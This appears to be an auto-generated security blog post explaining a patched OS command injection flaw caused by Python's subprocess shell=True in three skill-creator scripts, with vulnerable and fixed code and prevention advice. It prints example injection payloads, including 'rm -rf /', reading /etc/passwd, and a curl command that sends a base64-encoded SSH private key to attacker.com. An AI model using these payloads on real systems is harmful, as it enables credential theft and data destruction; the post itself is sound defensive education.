Command Injection via `shell=True`: How One Flag Opens the Door to OS Takeover

Vulnerability: CWE-78 — OS Command Injection
Severity: 🔴 Critical
Affected Files: run_eval.py, improve_description.py, generate_review.py
Status: ✅ Patched

Introduction

There's a deceptively innocent-looking parameter in Python's subprocess module that has been responsible for countless critical security vulnerabilities: shell=True. When combined with user-supplied input, this single flag can transform a routine script execution into a full operating system takeover.

This post breaks down a recently patched critical vulnerability found in the skill-creator pipeline — a real-world example of how shell=True and unsanitized input create a perfect storm for command injection attacks. Whether you're a seasoned backend engineer or a developer just getting started with Python scripting, understanding this class of vulnerability is non-negotiable in today's threat landscape.

The Vulnerability Explained

What Is Command Injection?

OS Command Injection (CWE-78) occurs when an application passes user-controlled data to a system shell without proper sanitization. The shell — whether bash, sh, cmd.exe, or others — interprets special characters as control operators, not as literal data. This means an attacker can "break out" of the intended command and inject their own.

In Python, the danger zone looks like this:

# ❌ VULNERABLE: shell=True with user input
import subprocess

user_input = request.args.get("skill_name")
subprocess.Popen(f"run_eval --skill {user_input}", shell=True)

When shell=True is set, Python hands the entire string to the operating system shell for interpretation. The shell doesn't know or care which parts were "intended" by the developer — it processes everything according to its own syntax rules.

How Does the Shell Interpret Special Characters?

The OS shell recognizes a variety of characters as command operators:

Character	Shell Meaning	Example Attack
`;`	Command separator	`skill; rm -rf /`
`\\|`	Pipe output to next command	`skill \\| curl attacker.com`
`&&`	Run next if previous succeeds	`skill && cat /etc/passwd`
`\\|\\|`	Run next if previous fails	`skill \\|\\| whoami`
`	Command substitution	skill`id`
`$()`	Command substitution	`skill$(cat ~/.ssh/id_rsa)`
`>`	Redirect output	`skill > /tmp/backdoor.sh`

The Vulnerable Code Pattern

In the skill-creator pipeline, three scripts were identified as invoking subprocess.Popen or subprocess.run with shell=True while incorporating user-supplied CLI arguments directly into the command string:

# ❌ VULNERABLE pattern (simplified illustration)
import subprocess
import sys

skill_path = sys.argv[1]  # User-controlled input from CLI argument

# The entire string is passed to the shell — shell=True is the culprit
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE
)

This pattern appeared across:
- resources/skills/skill-creator/scripts/run_eval.py (line 85)
- resources/skills/skill-creator/scripts/improve_description.py
- resources/skills/skill-creator/eval-viewer/generate_review.py

A Concrete Attack Scenario

Let's make this tangible. Imagine a developer runs the skill evaluation pipeline and the skill_path argument is sourced from an external input — a config file, an API response, a web form, or even a crafted filename:

Normal input:

/home/user/skills/my_skill

Malicious input:

/home/user/skills/my_skill; curl -s https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) &

The shell now executes two commands:
1. python evaluate.py --input /home/user/skills/my_skill ← intended
2. curl -s https://attacker.com/exfil?data=<base64-encoded SSH private key> ← injected

In a CI/CD pipeline or automated evaluation environment, this could lead to:

🔑 Credential theft — SSH keys, API tokens, environment variables
🗂️ Data exfiltration — source code, model weights, proprietary datasets
🚪 Backdoor installation — persistent access via reverse shells
💣 Destructive actions — file deletion, service disruption
🌐 Lateral movement — pivoting to other systems on the network

The impact is classified as Critical because successful exploitation grants the attacker the same OS-level privileges as the process running the script — with no authentication required beyond the ability to influence the input.

The Fix

The Core Principle: Never Use `shell=True` with User Input

The fix involves two complementary changes:

Remove shell=True — pass commands as a list instead of a string
Validate and sanitize inputs — never trust external data

Before vs. After

❌ Before (Vulnerable):

import subprocess
import sys

skill_path = sys.argv[1]

# shell=True interprets the entire string through the OS shell
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

✅ After (Fixed):

import subprocess
import sys
import shlex
import os

skill_path = sys.argv[1]

# Validate the input before use
if not os.path.exists(skill_path):
    raise ValueError(f"Invalid skill path: {skill_path}")

# Pass as a list — no shell interpretation, no injection possible
result = subprocess.Popen(
    ["python", "evaluate.py", "--input", skill_path],
    shell=False,  # explicit is better than implicit
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

Why Does the List Form Prevent Injection?

When you pass a list to subprocess.Popen (without shell=True), Python uses execvp (on Unix) or CreateProcess (on Windows) to launch the process directly. Each list element becomes a discrete argument — the OS never invokes a shell to interpret the string.

This means special characters like ;, |, and $() are passed literally to the target program as part of an argument value. They have no special meaning. The attack surface disappears entirely.

# These are equivalent in intent, but VERY different in security:

# ❌ Shell interprets the string — injection possible
subprocess.run(f"echo {user_input}", shell=True)

# ✅ OS passes arguments directly — injection impossible
subprocess.run(["echo", user_input], shell=False)

When `shell=True` Is Genuinely Needed

Occasionally, shell features like glob expansion (*.txt), shell built-ins (cd, export), or pipe chaining are legitimately required. In those cases:

import shlex

# shlex.quote() wraps the value in single quotes and escapes internal quotes
safe_input = shlex.quote(user_input)
subprocess.run(f"some_command {safe_input}", shell=True)

However, shlex.quote() should be considered a last resort, not a first line of defense. Eliminating shell=True is always the preferred approach.

Prevention & Best Practices

1. Default to List-Form Subprocess Calls

Make it a team convention: subprocess calls always use list arguments unless there's a documented, reviewed reason to do otherwise.

# Establish this as your team's standard pattern
subprocess.run(["command", "arg1", "arg2", user_input], check=True)

2. Validate Inputs Before Processing

Apply allowlist validation to any input that will be used in a subprocess call:

import re
import os

def validate_skill_path(path: str) -> str:
    """Validate that a skill path is safe to use."""
    # Allowlist: only alphanumerics, hyphens, underscores, slashes, dots
    if not re.match(r'^[a-zA-Z0-9/_\-\.]+$', path):
        raise ValueError(f"Skill path contains invalid characters: {path}")

    # Ensure the path exists and is within the expected directory
    abs_path = os.path.realpath(path)
    allowed_base = os.path.realpath("/app/skills")
    if not abs_path.startswith(allowed_base):
        raise ValueError("Path traversal detected")

    return abs_path

3. Apply the Principle of Least Privilege

Run scripts with the minimum permissions required. A command injection in a low-privilege process is far less damaging than one running as root or with broad cloud IAM permissions.

# Run evaluation scripts as a dedicated, restricted user
sudo -u skill-evaluator python run_eval.py --input "$SKILL_PATH"

4. Use Static Analysis Tools

Integrate security scanners into your CI/CD pipeline to catch these patterns automatically:

Bandit — Python-specific security linter; detects shell=True usage (rule B602, B603)
Semgrep — Highly customizable static analysis with rules for subprocess injection
CodeQL — GitHub's semantic code analysis engine
Safety — Checks Python dependencies for known vulnerabilities

# Example: Bandit in GitHub Actions
- name: Run Bandit Security Scan
  run: |
    pip install bandit
    bandit -r . -ll --skip B101 -f json -o bandit-report.json

5. Code Review Checklist

Add these questions to your security-focused code review checklist:

[ ] Does this code call subprocess with shell=True?
[ ] Does any subprocess argument originate from user input, environment variables, or external data sources?
[ ] Is input validated against an allowlist before use?
[ ] Does the process run with the minimum required privileges?

6. Relevant Security Standards

This vulnerability maps to well-established security standards:

CWE-78: Improper Neutralization of Special Elements used in an OS Command
OWASP A03:2021: Injection (consistently in the OWASP Top 10)
OWASP Testing Guide: WSTG-INPV-12 — Testing for Command Injection
NIST SP 800-53: SI-10 — Information Input Validation

Conclusion

The shell=True vulnerability pattern is a textbook example of how a single, seemingly convenient parameter can introduce catastrophic security risk. The fix is straightforward — switch from string-based to list-based subprocess calls — but the lesson runs deeper: never trust user input, and always understand the security implications of the APIs you use.

Key takeaways from this vulnerability:

shell=True + user input = command injection. This is one of the most reliable rules in application security.
The fix is simple but the impact of not fixing it is severe — Critical-severity vulnerabilities like this can lead to full system compromise.
Defense in depth matters — Input validation, least privilege, and static analysis together create multiple layers of protection.
Automated scanning catches what code review misses — Integrate tools like Bandit and Semgrep into your pipeline before code ships.

Security vulnerabilities like this one are rarely the result of malicious intent — they're the product of convenience, time pressure, and incomplete understanding of a platform's security model. The best defense is education, tooling, and a culture that treats security as a first-class concern alongside functionality and performance.

Write safe code. Review with security in mind. And when in doubt, check the docs for the security implications of every parameter you set.

This post was generated as part of an automated security fix workflow by OrbisAI Security. The vulnerability was identified by multi-agent AI scanning, patched, and verified through re-scan and LLM code review.

Have a vulnerability you'd like explained? Security education is the first line of defense.

Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

Command Injection via `shell=True`: How One Flag Opens the Door to OS Takeover

Introduction

The Vulnerability Explained

What Is Command Injection?

How Does the Shell Interpret Special Characters?

The Vulnerable Code Pattern

A Concrete Attack Scenario

The Fix

The Core Principle: Never Use `shell=True` with User Input

Before vs. After

Why Does the List Form Prevent Injection?

When `shell=True` Is Genuinely Needed

Prevention & Best Practices

1. Default to List-Form Subprocess Calls

2. Validate Inputs Before Processing

3. Apply the Principle of Least Privilege

4. Use Static Analysis Tools

5. Code Review Checklist

6. Relevant Security Standards

Conclusion

View the Security Fix

Related Articles

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

Introduction

The Vulnerability Explained

What Is Command Injection?

How Does the Shell Interpret Special Characters?

The Vulnerable Code Pattern

A Concrete Attack Scenario

The Fix

The Core Principle: Never Use shell=True with User Input

Before vs. After

Why Does the List Form Prevent Injection?

When shell=True Is Genuinely Needed

Prevention & Best Practices

1. Default to List-Form Subprocess Calls

2. Validate Inputs Before Processing

3. Apply the Principle of Least Privilege

4. Use Static Analysis Tools

5. Code Review Checklist

6. Relevant Security Standards

Conclusion

View the Security Fix

Related Articles

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

Command Injection via `shell=True`: How One Flag Opens the Door to OS Takeover

The Core Principle: Never Use `shell=True` with User Input

When `shell=True` Is Genuinely Needed